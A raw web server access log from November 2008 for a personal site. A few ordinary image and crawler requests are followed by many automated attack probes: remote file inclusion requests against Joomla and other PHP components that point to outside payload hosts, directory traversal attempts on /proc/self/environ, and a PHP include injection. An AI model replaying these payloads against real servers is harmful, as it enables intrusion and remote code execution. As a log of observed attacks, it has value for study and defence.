79.45.175.236 - - [03/Nov/2008:09:54:32 -0600] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:32 -0600] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:32 -0600] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:32 -0600] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:32 -0600] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:38 -0600] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:38 -0600] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:38 -0600] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:39 -0600] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
211.234.100.126 - - [03/Nov/2008:09:59:24 -0600] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
211.234.100.126 - - [03/Nov/2008:09:59:24 -0600] "GET /logs/access_log.1208304000///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
211.234.100.126 - - [03/Nov/2008:09:59:24 -0600] "GET /logs/access_log.1203724800///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
211.234.100.126 - - [03/Nov/2008:09:59:24 -0600] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
66.40.56.35 - - [03/Nov/2008:09:59:48 -0600] "GET /logs//main.php?sayfa=http://hucad.com/images/images.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
66.40.56.35 - - [03/Nov/2008:09:59:48 -0600] "GET //main.php?sayfa=http://hucad.com/images/images.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
211.234.100.126 - - [03/Nov/2008:10:02:16 -0600] "GET //modules/xfsection/modify.php?dir_module=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:10:02:28 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:10:02:29 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
211.223.228.3 - - [03/Nov/2008:10:02:29 -0600] "GET /logs/impex/ImpExData.php?systempath=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.223.228.3 - - [03/Nov/2008:10:02:29 -0600] "GET /impex/ImpExData.php?systempath=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 303 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
74.6.22.159 - - [03/Nov/2008:10:03:05 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.30.91 - - [03/Nov/2008:10:03:06 -0600] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
59.125.183.76 - - [03/Nov/2008:10:03:12 -0600] "GET /logs/send_reminders.php?includedir=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
59.125.183.76 - - [03/Nov/2008:10:03:12 -0600] "GET /send_reminders.php?includedir=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
78.31.64.178 - - [03/Nov/2008:10:03:35 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:10:03:36 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:10:03:56 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:10:03:56 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:10:03:57 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:10:03:57 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
211.223.228.3 - - [03/Nov/2008:10:04:13 -0600] "GET /logs/enc/content.php?Home_Path=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.223.228.3 - - [03/Nov/2008:10:04:13 -0600] "GET /enc/content.php?Home_Path=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
93.186.183.3 - - [03/Nov/2008:10:04:26 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:10:04:26 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:10:04:29 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:10:04:29 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:10:04:29 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:10:04:29 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
64.246.187.54 - - [03/Nov/2008:10:04:39 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.246.187.54 - - [03/Nov/2008:10:04:39 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
78.129.231.189 - - [03/Nov/2008:10:06:59 -0600] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
78.129.231.189 - - [03/Nov/2008:10:06:59 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
78.129.231.189 - - [03/Nov/2008:10:06:59 -0600] "GET /logs/access_log.1216512000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.222.4.51 - - [03/Nov/2008:10:08:11 -0600] "GET /logs/access_log.1206576000/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:10:08:11 -0600] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:10:08:12 -0600] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
193.84.183.38 - - [03/Nov/2008:10:10:07 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
193.84.183.38 - - [03/Nov/2008:10:10:07 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.63.65.43 - - [03/Nov/2008:10:10:55 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.64"
212.63.65.43 - - [03/Nov/2008:10:10:55 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.64"
212.63.65.43 - - [03/Nov/2008:10:10:55 -0600] "GET /logs/access_log.1214956800//phpsecurityadmin/include/logout.php?PSA_PATH=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.64"
82.78.216.197 - - [03/Nov/2008:10:11:39 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:10:11:39 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:10:11:40 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:10:11:40 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.813"
195.210.42.40 - - [03/Nov/2008:10:11:44 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hucad.com/images/images.txt?? HTTP/1.0" 404 313 "-""libwww-perl/5.53"
195.210.42.40 - - [03/Nov/2008:10:11:45 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hucad.com/images/images.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
212.63.65.43 - - [03/Nov/2008:10:11:56 -0600] "GET /logs/access_log.1215302400//phpsecurityadmin/include/logout.php?PSA_PATH=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.64"
193.84.183.38 - - [03/Nov/2008:10:12:02 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
193.84.183.38 - - [03/Nov/2008:10:12:03 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
193.84.183.38 - - [03/Nov/2008:10:12:11 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
193.84.183.38 - - [03/Nov/2008:10:12:11 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
83.222.4.51 - - [03/Nov/2008:10:14:43 -0600] "GET /logs/access_log.1208304000/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
116.126.143.88 - - [03/Nov/2008:10:16:36 -0600] "GET /logs/access_log.1214179200/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
116.126.143.88 - - [03/Nov/2008:10:16:37 -0600] "GET /scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
116.126.143.88 - - [03/Nov/2008:10:16:37 -0600] "GET /logs/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
88.84.157.127 - - [03/Nov/2008:10:16:52 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:10:16:52 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://clusty.com/search??? HTTP/1.1" 404 349 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:10:16:52 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 349 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:10:16:52 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:10:16:52 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://clusty.com/search??? HTTP/1.1" 404 344 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:10:16:52 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:10:16:52 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 344 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:10:16:53 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""XXXXXX"
88.84.145.169 - - [03/Nov/2008:10:17:11 -0600] "GET //core/includes.php?CMS_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:10:17:11 -0600] "GET /logs//core/includes.php?CMS_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:10:17:11 -0600] "GET /logs/access_log.1215302400//core/includes.php?CMS_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
200.85.32.31 - - [03/Nov/2008:10:17:51 -0600] "GET /logs/access_log.1216512000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
200.85.32.31 - - [03/Nov/2008:10:17:51 -0600] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
200.85.32.31 - - [03/Nov/2008:10:17:51 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
62.87.154.41 - - [03/Nov/2008:10:17:53 -0600] "GET /logs//classes/adodbt/sql.php?classes_dir=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:10:17:54 -0600] "GET //classes/adodbt/sql.php?classes_dir=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:10:18:56 -0600] "GET /logs/access_log.1215302400%20//core/includes.php?CMS_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
212.63.65.43 - - [03/Nov/2008:10:20:06 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://not-network.com/idscan8.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.64"
212.63.65.43 - - [03/Nov/2008:10:20:06 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://not-network.com/idscan8.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.64"
210.219.173.249 - - [03/Nov/2008:10:20:42 -0600] "GET /logs/access_log.1216425600%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:10:20:42 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
193.200.50.225 - - [03/Nov/2008:10:21:10 -0600] "GET /logs/access_log.1214265600 HTTP/1.1" 206 646470 "-""Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
74.6.8.122 - - [03/Nov/2008:10:23:19 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.122 - - [03/Nov/2008:10:23:19 -0600] "GET /logs/access_log.1203724800 HTTP/1.0" 200 354295 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.85.114.130 - - [03/Nov/2008:10:23:21 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:10:23:23 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:10:23:24 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
116.126.143.88 - - [03/Nov/2008:10:23:46 -0600] "GET /logs/access_log.1214179200/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
116.126.143.88 - - [03/Nov/2008:10:23:46 -0600] "GET /scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
116.126.143.88 - - [03/Nov/2008:10:23:47 -0600] "GET /logs/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
66.197.217.53 - - [03/Nov/2008:10:25:15 -0600] "GET /logs/access_log.1215302400%20//core/includes.php?CMS_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
66.197.217.53 - - [03/Nov/2008:10:25:16 -0600] "GET //core/includes.php?CMS_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.197.217.53 - - [03/Nov/2008:10:25:16 -0600] "GET /logs//core/includes.php?CMS_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
59.125.96.13 - - [03/Nov/2008:10:25:33 -0600] "GET /logs/access_log.1215302400//core/includes.php?CMS_ROOT=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
59.125.96.13 - - [03/Nov/2008:10:25:34 -0600] "GET //core/includes.php?CMS_ROOT=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
59.125.96.13 - - [03/Nov/2008:10:25:50 -0600] "GET /logs//core/includes.php?CMS_ROOT=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
195.210.42.40 - - [03/Nov/2008:10:26:04 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://hucad.com/images/images.txt?? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
195.210.42.40 - - [03/Nov/2008:10:26:04 -0600] "GET //poll/poll_ssi.php?include_path=http://hucad.com/images/images.txt?? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
87.106.16.18 - - [03/Nov/2008:10:26:32 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:10:26:32 -0600] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:10:26:35 -0600] "GET /logs/access_log.1216512000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
59.125.96.13 - - [03/Nov/2008:10:27:29 -0600] "GET /logs/access_log.1215302400%20//core/includes.php?CMS_ROOT=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
212.227.60.81 - - [03/Nov/2008:10:27:56 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clusty.com/search??? HTTP/1.1" 404 317 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [03/Nov/2008:10:27:56 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [03/Nov/2008:10:27:57 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 317 "-""XXXXXX"
212.227.60.81 - - [03/Nov/2008:10:27:57 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""XXXXXX"
212.227.60.81 - - [03/Nov/2008:10:27:57 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [03/Nov/2008:10:27:57 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clusty.com/search??? HTTP/1.1" 404 312 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [03/Nov/2008:10:27:57 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 312 "-""XXXXXX"
212.227.60.81 - - [03/Nov/2008:10:27:58 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""XXXXXX"
88.84.145.169 - - [03/Nov/2008:10:30:29 -0600] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:10:30:30 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:10:30:30 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
66.197.217.53 - - [03/Nov/2008:10:30:37 -0600] "GET /logs/access_log.1215302400//core/includes.php?CMS_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
217.153.37.130 - - [03/Nov/2008:10:35:36 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gundemde.com/l333tbi1tX.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
217.153.37.130 - - [03/Nov/2008:10:35:36 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gundemde.com/l333tbi1tX.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.55.208.121 - - [03/Nov/2008:10:35:39 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [03/Nov/2008:10:35:40 -0600] "GET /logs/access_log.1211068800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.219.173.249 - - [03/Nov/2008:10:35:54 -0600] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:10:35:54 -0600] "GET /logs/access_log.1216512000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
